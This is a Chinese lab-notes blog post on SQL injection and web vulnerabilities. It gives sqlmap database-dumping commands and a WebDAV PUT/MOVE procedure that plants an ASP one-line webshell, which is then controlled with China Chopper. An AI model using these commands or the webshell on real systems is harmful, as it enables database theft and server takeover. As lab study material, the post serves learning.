(9)SQL注入漏洞(实验)

2021/9/17 2:06:26

本文主要是介绍(9)SQL注入漏洞(实验),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

2021-9-16

--续

六、脱库(ctrl+c退出)

脱数据库

--dump-all

sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱) 

sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump   (一般用这个)

七、调线程

--thread       调线程  范围1-10

sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump --thread 10

--batch   不会再跳出询问选择 ,按照默认选择进行选择

sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all --thread 10 --batch

实验查网页漏洞

一、所用信息

网站IP:192.168.1.62

病毒:一句话木马病毒(<%eval request("chopper")%>)

菊花马(文件)

Burpsuit所用命令:OPTION(看)

PUT    (传)

MOVE  (改)

Destination:http://192.168.1.62/1.asp

  所用工具:burpsuit、菜刀

二、实验步骤

1、先将192.168.1.62在burpsuit中进行(proxy)抓包——右击-REPEATER-RESPONSE

2、用(options)命令看允许的命令。将第一行前缀改成OPTIONS-看里面允许了什么-右面那一栏-倒数二三行

3、再用put命令上传文件。

改的命令为:(1)、将txt文件的文件名改成xjj

  • 、将Destination:http://192.168.1.62/1.asp插入user命令下面
  • 、在最后一行空一行加入一句话木马(密码可以自己设)
  • MOVE命令来改txt命令的后缀名
  • 将DISTINATION后面的域名复制下来-添加进菜刀并输入密码-双击-拖入菊花马程序

6、再次进入网站-输入密码-即成功



这篇关于(9)SQL注入漏洞(实验)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程